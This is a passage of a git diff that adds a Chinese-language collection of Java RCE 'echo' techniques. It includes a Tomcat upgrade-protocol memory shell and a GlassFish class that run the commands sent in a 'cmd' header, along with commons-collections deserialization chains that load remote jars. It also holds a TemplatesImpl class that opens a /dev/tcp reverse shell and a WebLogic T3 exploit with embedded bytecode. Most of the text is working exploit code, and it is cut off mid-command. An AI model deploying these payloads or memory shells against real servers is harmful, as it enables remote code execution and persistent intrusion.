upgradeProtocols = null; + Field upgradeProtocolsField = AbstractHttp11Protocol.class.getDeclaredField("httpUpgradeProtocols"); + upgradeProtocolsField.setAccessible(true); + upgradeProtocols = (HashMap) upgradeProtocolsField.get(handler); + upgradeProtocols.put("http2.0", this); + upgradeProtocolsField.set(handler, upgradeProtocols); + System.out.println("success"); + } + + @Override + public String getHttpUpgradeName(boolean b) { + return null; + } + + @Override + public byte[] getAlpnIdentifier() { + return new byte[0]; + } + + @Override + public String getAlpnName() { + return null; + } + + @Override + public Processor getProcessor(SocketWrapperBase socketWrapperBase, Adapter adapter) { + return null; + } + + @Override + public InternalHttpUpgradeHandler getInternalUpgradeHandler(Adapter adapter, org.apache.coyote.Request request) { + return null; + } + + public boolean accept(org.apache.coyote.Request request) { + System.out.println("MyUpgrade.accept"); + String p = request.getHeader("cmd"); + try { + String[] cmd = System.getProperty("os.name").toLowerCase().contains("windows") ? new String[]{"cmd.exe", "/c", p} : new String[]{"/bin/sh", "-c", p}; + Field response = org.apache.coyote.Request.class.getDeclaredField("response"); + response.setAccessible(true); + Response resp = (Response) response.get(request); + byte[] result = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes(); + resp.doWrite(ByteBuffer.wrap(result)); + } catch (Exception e){} + return false; + } +} +``` + +使用 +```txt +Upgrade: http2.o +cmd: calc +Connection: Upgrade +``` diff --git "a/java\345\233\236\346\230\276/GlassFish/Echo_Request.java" "b/java\345\233\236\346\230\276/GlassFish/Echo_Request.java" new file mode 100644 index 0000000..cda1642 --- /dev/null +++ "b/java\345\233\236\346\230\276/GlassFish/Echo_Request.java" @@ -0,0 +1,81 @@ +package com.firebasky.exp; + +/** + * TargetObject = {org.glassfish.grizzly.threadpool.DefaultWorkerThread} + * ---> group = {java.lang.ThreadGroup} + * ---> threads = {class [Ljava.lang.Thread;} + * ---> [17] = {org.glassfish.grizzly.threadpool.DefaultWorkerThread} + * ---> objectCache = {org.glassfish.grizzly.ThreadCache$ObjectCache} + * ---> objectCacheElements = {class [Lorg.glassfish.grizzly.ThreadCache$ObjectCacheElement;} + * ---> [3] = {org.glassfish.grizzly.ThreadCache$ObjectCacheElement} + * ---> cache = {class [Ljava.lang.Object;} + * ---> [0] = {org.glassfish.grizzly.http.server.Request} + */ + + +/** + * GlassFish 回显 有问题获得的res为null,等待完善 + */ +public class Echo_Request { + static { + try { + getResponse(); + Runtime.getRuntime().exec("calc"); + } catch (Exception e) { + e.printStackTrace(); + } + } + public static void getResponse() throws Exception { + Thread thread = Thread.currentThread(); + java.lang.reflect.Field threadLocals = Thread.class.getDeclaredField("group"); + threadLocals.setAccessible(true); + Object threadLocalMap = threadLocals.get(thread); + + Class threadLocalMapClazz = Class.forName("java.lang.ThreadGroup"); + java.lang.reflect.Field tableField = threadLocalMapClazz.getDeclaredField("threads"); + tableField.setAccessible(true); + Object[] objects = (Object[]) tableField.get(threadLocalMap); + + Class entryClass = Class.forName("org.glassfish.grizzly.threadpool.DefaultWorkerThread"); + java.lang.reflect.Field entryValueField = entryClass.getDeclaredField("objectCache"); + entryValueField.setAccessible(true); + + for (Object object : objects) { + if (object != null) { + Object valueObject = entryValueField.get(object); + if (valueObject != null) { + if (valueObject.getClass().getName().equals("org.glassfish.grizzly.ThreadCache$ObjectCache")) { + java.lang.reflect.Field objectCacheElements = valueObject.getClass().getDeclaredField("objectCacheElements"); + objectCacheElements.setAccessible(true); + Object[] objects1 = (Object[]) objectCacheElements.get(valueObject); + + Class aClass = Class.forName("org.glassfish.grizzly.ThreadCache$ObjectCacheElement"); + java.lang.reflect.Field cache = aClass.getDeclaredField("cache"); + cache.setAccessible(true); + + for (Object o : objects1) { + if (o != null) { + Object[] objects2 = (Object[]) cache.get(o); + for (Object o1 : objects2) { + if(o1.getClass().getName().equals("org.glassfish.grizzly.http.server.Request")){ + //response + org.glassfish.grizzly.http.server.Response getResponse = (org.glassfish.grizzly.http.server.Response) o1.getClass().getMethod("getResponse").invoke(o1); + //request + org.glassfish.grizzly.http.server.Request getRequest = (org.glassfish.grizzly.http.server.Request) o1.getClass().getMethod("getRequest").invoke(o1); + String cmd1 = getRequest.getHeader("cmd"); + String[] cmd = !System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"sh", "-c", cmd1} : new String[]{"cmd.exe", "/c",cmd1}; + java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream(); + java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a"); + String output = s.hasNext() ? s.next() : ""; + getResponse.getWriter().write(output); + getResponse.getWriter().write("by Firebasky"); + } + } + } + } + } + } + } + } + } +} diff --git "a/java\345\233\236\346\230\276/HELP.md" "b/java\345\233\236\346\230\276/HELP.md" new file mode 100644 index 0000000..f10aa2d --- /dev/null +++ "b/java\345\233\236\346\230\276/HELP.md" @@ -0,0 +1,19 @@ +# Getting Started + +### Reference Documentation + +For further reference, please consider the following sections: + +* [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) +* [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.5.5/maven-plugin/reference/html/) +* [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.5.5/maven-plugin/reference/html/#build-image) +* [Spring Web](https://docs.spring.io/spring-boot/docs/2.5.5/reference/htmlsingle/#boot-features-developing-web-applications) + +### Guides + +The following guides illustrate how to use some features concretely: + +* [Building a RESTful Web Service](https://spring.io/guides/gs/rest-service/) +* [Serving Web Content with Spring MVC](https://spring.io/guides/gs/serving-web-content/) +* [Building REST services with Spring](https://spring.io/guides/tutorials/bookmarks/) + diff --git "a/java\345\233\236\346\230\276/Readme.md" "b/java\345\233\236\346\230\276/Readme.md" new file mode 100644 index 0000000..6b74f01 --- /dev/null +++ "b/java\345\233\236\346\230\276/Readme.md" @@ -0,0 +1,352 @@ +# java回显 + +**2022/5/2更新,发现fnmsd师傅弄跟dsf的回显感觉很np** +``` +https://blog.csdn.net/fnmsd/article/details/106709736 +https://blog.csdn.net/fnmsd/article/details/106890242 +``` + +发现个好项目 https://github.com/feihong-cs/Java-Rce-Echo + +>一般web服务是想办法获得response对象,可以参考[2021RCTF ezshell](https://github.com/Firebasky/ctf-Challenge/tree/main/RCTF-2021-EZshell) + +### 异常回显 + +我们将命令执行的结果给Exception(result),因为Exception可以传递string,在抛出异常throw e;之后在命令执行的过程中如果目标的代码逻辑存在过程中错误抛出异常就可以看到回显内容 + +```java +import java.io.BufferedReader; +import java.io.InputStreamReader; +public class RunCheckConfig { +public RunCheckConfig(String args) throws Exception +{ +Process proc = Runtime.getRuntime().exec(args); +BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream())); +StringBuffer sb = new StringBuffer(); +String line; +while ((line = br.readLine()) != null) +{ +sb.append(line).append("\n"); +} +String result = sb.toString(); +Exception e=new Exception(result); +throw e; +} +} +``` +**目前暂时没有找到真实的demo.....** + +### URLClassLoader抛出异常 + +```java +package exploit.firebasky; + +import java.io.BufferedInputStream; +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.InputStream; + +public class ErrorBaseExec +{ + public ErrorBaseExec(String cmd) throws Exception{ + do_exec(cmd); + } + + public static byte[] readBytes(InputStream in) + throws IOException + { + BufferedInputStream bufin = new BufferedInputStream(in); + int buffSize = 1024; + ByteArrayOutputStream out = new ByteArrayOutputStream(buffSize); + byte[] temp = new byte[buffSize]; + int size = 0; + while ((size = bufin.read(temp)) != -1) { + out.write(temp, 0, size); + } + bufin.close(); + + byte[] content = out.toByteArray(); + + return content; + } + + public static void do_exec(String cmd) + throws Exception + { + Process p = Runtime.getRuntime().exec(cmd); + byte[] stderr = readBytes(p.getErrorStream()); + byte[] stdout = readBytes(p.getInputStream()); + int exitValue = p.waitFor(); + if (exitValue == 0) { + throw new Exception("-----------------\r\n" + new String(stdout) + "-----------------\r\n"); + } + throw new Exception("-----------------\r\n" + new String(stderr) + "-----------------\r\n"); + } + + public static void main(String[] args) + throws Exception + { + do_exec(args[0]); + } +} +``` +编译成jar之后可以封装到cc利用链组件中 +```java +public static Transformer[] EchoCC() throws Exception { + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(URLClassLoader.class), + new InvokerTransformer("getConstructor", + new Class[]{Class[].class}, + new Object[]{new Class[]{URL[].class}}), + new InvokerTransformer("newInstance", + new Class[]{Object[].class}, + new Object[]{new Object[]{new URL[]{new URL("http://127.0.0.1:8099/ErrorBaseExec.jar")}}}), + new InvokerTransformer("loadClass", + new Class[]{String.class}, + new Object[]{"exploit.firebasky.ErrorBaseExec"}), + new InvokerTransformer("getConstructor", + new Class[]{Class[].class}, + new Object[]{new Class[]{String.class}}), + new InvokerTransformer("newInstance", + new Class[]{Object[].class}, + new Object[]{new String[]{"ipconfig"}}) + }; + return transformers; + } +``` +### defineClass +其实就是通过ClassLoader去执行(反射)我们自定义类的字节码。 + +```java +public static String FiletoBytes(String filename) throws Exception{ + String buf = null; + File file = new File(filename); + FileInputStream fis = null; + try { + fis = new FileInputStream(file); + int size = fis.available(); + byte[] bytes = new byte[size]; + fis.read(bytes); + buf = Arrays.toString(bytes); + fis.close(); + return buf; + } catch (FileNotFoundException e) { + e.printStackTrace(); + } catch (IOException e) { + e.printStackTrace(); + } + return buf; + } + +@Override + protected Class findClass(String name) throws ClassNotFoundException { + if (name == myClassName) { + System.out.println("加载" + name + "类"); + return defineClass(myClassName, bs, 0, bs.length); + } + return super.findClass(name); + } +``` + +### 中间件回显 +由于没有是研究tomcat等容器的回显。能力有限。 + + +>中间件而言多数重写了thread类,在thread中保存了req和resp,可以通过获取当前线程,在resp中写入回显结果 + + + +参考:https://l3yx.github.io/2020/03/31/Java-Web%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%9B%9E%E6%98%BE%E6%80%BB%E7%BB%93/ + +直接用项目的代码。 + +在利用tempimpl创建类的时候可以使用如下代码 +```java +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; +import java.io.IOException; + +public class evilclass extends AbstractTranslet { + static { + try{ + Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done"}); + }catch (IOException e){ + try{ + Runtime.getRuntime().exec(new String[]{"cmd", "/c", "calc"}); + }catch (IOException ee){ + } + } + } + @Override + public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { + + } + + @Override + public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { + + } +} +``` + +### RMI绑定实例 +通过加载执行代码,相当于创建了一个server的rmi实现了定义接口的方法返回是返回执行命令的结果,然后客户端去调用创建的rmi的接口方法,获得返回值。 + +可以参考weblogic回显通过rmi. +```java + +package com.test; + +import com.supeream.serial.Reflections; +import com.supeream.serial.SerialDataGenerator; +import com.supeream.serial.Serializables; +import com.supeream.ssl.WeblogicTrustManager; +import com.supeream.weblogic.T3ProtocolOperation; +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.map.LazyMap; +import org.mozilla.classfile.DefiningClassLoader; +import weblogic.cluster.singleton.ClusterMasterRemote; +import weblogic.corba.utils.MarshalledObject; +import weblogic.jndi.Environment; + +import javax.naming.Context; +import java.io.ByteArrayOutputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Proxy; +import java.util.HashMap; +import java.util.HashSet; +import java.util.Map; + +public class Main { + private static String host = "172.16.2.129"; + private static String port = "7001"; + private static final String classname = "com.test.payload.RemoteImpl"; + private static final byte[] bs = new byte[]{ + -54, -2, -70, -66, 0, 0, 0, 50, 0, -116, 10, 0, 32, 0, 83, 7, 0, 84, 10, 0, 2, 0, 83, 7, 0, 85, 10, 0, 4, 0, 83, 8, 0, 86, 11, 0, 87, 0, 88, 10, 0, 2, 0, 89, 7, 0, 90, 10, 0, 9, 0, 91, 7, 0, 92, 10, 0, 11, 0, 83, 8, 0, 93, 11, 0, 94, 0, 95, 8, 0, 96, 7, 0, 97, 10, 0, 16, 0, 98, 10, 0, 16, 0, 99, 10, 0, 16, 0, 100, 7, 0, 101, 7, 0, 102, 10, 0, 103, 0, 104, 10, 0, 21, 0, 105, 10, 0, 20, 0, 106, 7, 0, 107, 10, 0, 25, 0, 83, 10, 0, 20, 0, 108, 10, 0, 25, 0, 109, 8, 0, 110, 10, 0, 25, 0, 111, 10, 0, 9, 0, 112, 7, 0, 113, 7, 0, 114, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 29, 76, 99, 111, 109, 47, 116, 101, 115, 116, 47, 112, 97, 121, 108, 111, 97, 100, 47, 82, 101, 109, 111, 116, 101, 73, 109, 112, 108, 59, 1, 0, 4, 109, 97, 105, 110, 1, 0, 22, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 7, 99, 111, 110, 116, 101, 120, 116, 1, 0, 22, 76, 106, 97, 118, 97, 120, 47, 110, 97, 109, 105, 110, 103, 47, 67, 111, 110, 116, 101, 120, 116, 59, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 4, 97, 114, 103, 115, 1, 0, 19, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 6, 114, 101, 109, 111, 116, 101, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 48, 7, 0, 84, 7, 0, 90, 1, 0, 17, 115, 101, 116, 83, 101, 114, 118, 101, 114, 76, 111, 99, 97, 116, 105, 111, 110, 1, 0, 39, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 3, 99, 109, 100, 1, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 10, 69, 120, 99, 101, 112, 116, 105, 111, 110, 115, 7, 0, 115, 1, 0, 17, 103, 101, 116, 83, 101, 114, 118, 101, 114, 76, 111, 99, 97, 116, 105, 111, 110, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 4, 99, 109, 100, 115, 1, 0, 16, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 105, 115, 116, 59, 1, 0, 14, 112, 114, 111, 99, 101, 115, 115, 66, 117, 105, 108, 100, 101, 114, 1, 0, 26, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 4, 112, 114, 111, 99, 1, 0, 19, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 2, 98, 114, 1, 0, 24, 76, 106, 97, 118, 97, 47, 105, 111, 47, 66, 117, 102, 102, 101, 114, 101, 100, 82, 101, 97, 100, 101, 114, 59, 1, 0, 2, 115, 98, 1, 0, 24, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 102, 102, 101, 114, 59, 1, 0, 4, 108, 105, 110, 101, 1, 0, 22, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 121, 112, 101, 84, 97, 98, 108, 101, 1, 0, 36, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 105, 115, 116, 60, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 62, 59, 7, 0, 116, 7, 0, 117, 7, 0, 97, 7, 0, 118, 7, 0, 101, 7, 0, 107, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 36, 82, 101, 109, 111, 116, 101, 73, 109, 112, 108, 46, 106, 97, 118, 97, 32, 102, 114, 111, 109, 32, 73, 110, 112, 117, 116, 70, 105, 108, 101, 79, 98, 106, 101, 99, 116, 12, 0, 34, 0, 35, 1, 0, 27, 99, 111, 109, 47, 116, 101, 115, 116, 47, 112, 97, 121, 108, 111, 97, 100, 47, 82, 101, 109, 111, 116, 101, 73, 109, 112, 108, 1, 0, 27, 106, 97, 118, 97, 120, 47, 110, 97, 109, 105, 110, 103, 47, 73, 110, 105, 116, 105, 97, 108, 67, 111, 110, 116, 101, 120, 116, 1, 0, 4, 89, 52, 101, 114, 7, 0, 119, 12, 0, 120, 0, 121, 12, 0, 60, 0, 61, 1, 0, 19, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 122, 0, 35, 1, 0, 19, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 65, 114, 114, 97, 121, 76, 105, 115, 116, 1, 0, 9, 47, 98, 105, 110, 47, 98, 97, 115, 104, 7, 0, 117, 12, 0, 123, 0, 124, 1, 0, 2, 45, 99, 1, 0, 24, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 66, 117, 105, 108, 100, 101, 114, 12, 0, 34, 0, 125, 12, 0, 126, 0, 127, 12, 0, -128, 0, -127, 1, 0, 22, 106, 97, 118, 97, 47, 105, 111, 47, 66, 117, 102, 102, 101, 114, 101, 100, 82, 101, 97, 100, 101, 114, 1, 0, 25, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 82, 101, 97, 100, 101, 114, 7, 0, 118, 12, 0, -126, 0, -125, 12, 0, 34, 0, -124, 12, 0, 34, 0, -123, 1, 0, 22, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 102, 102, 101, 114, 12, 0, -122, 0, -121, 12, 0, -120, 0, -119, 1, 0, 1, 10, 12, 0, -118, 0, -121, 12, 0, -117, 0, -121, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 1, 0, 46, 119, 101, 98, 108, 111, 103, 105, 99, 47, 99, 108, 117, 115, 116, 101, 114, 47, 115, 105, 110, 103, 108, 101, 116, 111, 110, 47, 67, 108, 117, 115, 116, 101, 114, 77, 97, 115, 116, 101, 114, 82, 101, 109, 111, 116, 101, 1, 0, 24, 106, 97, 118, 97, 47, 114, 109, 105, 47, 82, 101, 109, 111, 116, 101, 69, 120, 99, 101, 112, 116, 105, 111, 110, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 1, 0, 14, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 105, 115, 116, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 1, 0, 20, 106, 97, 118, 97, 120, 47, 110, 97, 109, 105, 110, 103, 47, 67, 111, 110, 116, 101, 120, 116, 1, 0, 6, 114, 101, 98, 105, 110, 100, 1, 0, 39, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 41, 86, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 1, 0, 3, 97, 100, 100, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 41, 90, 1, 0, 19, 40, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 105, 115, 116, 59, 41, 86, 1, 0, 19, 114, 101, 100, 105, 114, 101, 99, 116, 69, 114, 114, 111, 114, 83, 116, 114, 101, 97, 109, 1, 0, 29, 40, 90, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 5, 115, 116, 97, 114, 116, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 14, 103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 40, 41, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 24, 40, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 41, 86, 1, 0, 19, 40, 76, 106, 97, 118, 97, 47, 105, 111, 47, 82, 101, 97, 100, 101, 114, 59, 41, 86, 1, 0, 8, 114, 101, 97, 100, 76, 105, 110, 101, 1, 0, 20, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 6, 97, 112, 112, 101, 110, 100, 1, 0, 44, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 102, 102, 101, 114, 59, 1, 0, 8, 116, 111, 83, 116, 114, 105, 110, 103, 1, 0, 10, 103, 101, 116, 77, 101, 115, 115, 97, 103, 101, 0, 33, 0, 2, 0, 32, 0, 1, 0, 33, 0, 0, 0, 4, 0, 1, 0, 34, 0, 35, 0, 1, 0, 36, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 37, 0, 0, 0, 6, 0, 1, 0, 0, 0, 14, 0, 38, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 39, 0, 40, 0, 0, 0, 9, 0, 41, 0, 42, 0, 1, 0, 36, 0, 0, 0, -81, 0, 3, 0, 3, 0, 0, 0, 42, -69, 0, 2, 89, -73, 0, 3, 76, -69, 0, 4, 89, -73, 0, 5, 77, 44, 18, 6, 43, -71, 0, 7, 3, 0, 43, 42, 3, 50, -74, 0, 8, 87, -89, 0, 8, 77, 44, -74, 0, 10, -79, 0, 1, 0, 8, 0, 33, 0, 36, 0, 9, 0, 3, 0, 37, 0, 0, 0, 34, 0, 8, 0, 0, 0, 17, 0, 8, 0, 19, 0, 16, 0, 20, 0, 25, 0, 21, 0, 33, 0, 24, 0, 36, 0, 22, 0, 37, 0, 23, 0, 41, 0, 25, 0, 38, 0, 0, 0, 42, 0, 4, 0, 16, 0, 17, 0, 43, 0, 44, 0, 2, 0, 37, 0, 4, 0, 45, 0, 46, 0, 2, 0, 0, 0, 42, 0, 47, 0, 48, 0, 0, 0, 8, 0, 34, 0, 49, 0, 40, 0, 1, 0, 50, 0, 0, 0, 19, 0, 2, -1, 0, 36, 0, 2, 7, 0, 51, 7, 0, 52, 0, 1, 7, 0, 53, 4, 0, 1, 0, 54, 0, 55, 0, 2, 0, 36, 0, 0, 0, 63, 0, 0, 0, 3, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 37, 0, 0, 0, 6, 0, 1, 0, 0, 0, 31, 0, 38, 0, 0, 0, 32, 0, 3, 0, 0, 0, 1, 0, 39, 0, 40, 0, 0, 0, 0, 0, 1, 0, 56, 0, 57, 0, 1, 0, 0, 0, 1, 0, 47, 0, 57, 0, 2, 0, 58, 0, 0, 0, 4, 0, 1, 0, 59, 0, 1, 0, 60, 0, 61, 0, 2, 0, 36, 0, 0, 1, 126, 0, 5, 0, 8, 0, 0, 0, 124, -69, 0, 11, 89, -73, 0, 12, 77, 44, 18, 13, -71, 0, 14, 2, 0, 87, 44, 18, 15, -71, 0, 14, 2, 0, 87, 44, 43, -71, 0, 14, 2, 0, 87, -69, 0, 16, 89, 44, -73, 0, 17, 78, 45, 4, -74, 0, 18, 87, 45, -74, 0, 19, 58, 4, -69, 0, 20, 89, -69, 0, 21, 89, 25, 4, -74, 0, 22, -73, 0, 23, -73, 0, 24, 58, 5, -69, 0, 25, 89, -73, 0, 26, 58, 6, 25, 5, -74, 0, 27, 89, 58, 7, -58, 0, 19, 25, 6, 25, 7, -74, 0, 28, 18, 29, -74, 0, 28, 87, -89, -1, -24, 25, 6, -74, 0, 30, -80, 77, 44, -74, 0, 31, -80, 0, 1, 0, 0, 0, 117, 0, 118, 0, 9, 0, 4, 0, 37, 0, 0, 0, 58, 0, 14, 0, 0, 0, 38, 0, 8, 0, 40, 0, 17, 0, 41, 0, 26, 0, 42, 0, 34, 0, 44, 0, 43, 0, 45, 0, 49, 0, 46, 0, 55, 0, 48, 0, 76, 0, 49, 0, 85, 0, 52, 0, 96, 0, 53, 0, 112, 0, 56, 0, 118, 0, 57, 0, 119, 0, 58, 0, 38, 0, 0, 0, 92, 0, 9, 0, 8, 0, 110, 0, 62, 0, 63, 0, 2, 0, 43, 0, 75, 0, 64, 0, 65, 0, 3, 0, 55, 0, 63, 0, 66, 0, 67, 0, 4, 0, 76, 0, 42, 0, 68, 0, 69, 0, 5, 0, 85, 0, 33, 0, 70, 0, 71, 0, 6, 0, 93, 0, 25, 0, 72, 0, 57, 0, 7, 0, 119, 0, 5, 0, 45, 0, 46, 0, 2, 0, 0, 0, 124, 0, 39, 0, 40, 0, 0, 0, 0, 0, 124, 0, 56, 0, 57, 0, 1, 0, 73, 0, 0, 0, 12, 0, 1, 0, 8, 0, 110, 0, 62, 0, 74, 0, 2, 0, 50, 0, 0, 0, 52, 0, 3, -1, 0, 85, 0, 7, 7, 0, 52, 7, 0, 75, 7, 0, 76, 7, 0, 77, 7, 0, 78, 7, 0, 79, 7, 0, 80, 0, 0, -4, 0, 26, 7, 0, 75, -1, 0, 5, 0, 2, 7, 0, 52, 7, 0, 75, 0, 1, 7, 0, 53, 0, 58, 0, 0, 0, 4, 0, 1, 0, 59, 0, 1, 0, 81, 0, 0, 0, 2, 0, 82, + }; + + public static void main(String[] args) { + try { + String url = "t3://" + host + ":" + port; + // 安装RMI实例 + invokeRMI(classname, bs); + + Environment environment = new Environment(); + environment.setProviderUrl(url); + environment.setEnableServerAffinity(false); + environment.setSSLClientTrustManager(new WeblogicTrustManager()); + Context context = environment.getInitialContext(); + ClusterMasterRemote remote = (ClusterMasterRemote) context.lookup("Y4er"); + + // 调用RMI实例执行命令 + String res = remote.getServerLocation("ifconfig"); + System.out.println(res); + } catch (Exception e) { + e.printStackTrace(); + } + + } + + private static void invokeRMI(String className, byte[] clsData) throws Exception { + // common-collection1 构造transformers 定义自己的RMI接口 + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(DefiningClassLoader.class), + new InvokerTransformer("getDeclaredConstructor", new Class[]{Class[].class}, new Object[]{new Class[0]}), + new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[0]}), + new InvokerTransformer("defineClass", + new Class[]{String.class, byte[].class}, new Object[]{className, clsData}), + new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"main", new Class[]{String[].class}}), + new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{null}}), + new ConstantTransformer(new HashSet())}; + + final Transformer transformerChain = new ChainedTransformer(transformers); + final Map innerMap = new HashMap(); + + final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); + + InvocationHandler handler = (InvocationHandler) Reflections + .getFirstCtor( + "sun.reflect.annotation.AnnotationInvocationHandler") + .newInstance(Override.class, lazyMap); + + final Map mapProxy = Map.class + .cast(Proxy.newProxyInstance(SerialDataGenerator.class.getClassLoader(), + new Class[]{Map.class}, handler)); + + handler = (InvocationHandler) Reflections.getFirstCtor( + "sun.reflect.annotation.AnnotationInvocationHandler") + .newInstance(Override.class, mapProxy); + + // 序列化数据 MarshalledObject绕过 + Object obj = new MarshalledObject(handler); + ByteArrayOutputStream out = new ByteArrayOutputStream(); + ObjectOutputStream objOut = new ObjectOutputStream(out); + objOut.writeObject(obj); + objOut.flush(); + objOut.close(); + byte[] payload = out.toByteArray(); + // t3发送 + T3ProtocolOperation.send(host, port, payload); + } +} +``` +#### weblogic + +https://xz.aliyun.com/t/5299 + +https://github.com/lufeirider/CVE-2019-2725 + + +### 通过写文件 +linux +```bash +// 进入test.html的根目录并执行id命令写入1.txt +cd $(find -name "test.html" -type f -exec dirname {} \; | sed 1q) && echo `id` > 1.txt +``` +win +```bash +$file = Get-ChildItem -Path . -Filter test.html -recurse -ErrorAction SilentlyContinue;$f = 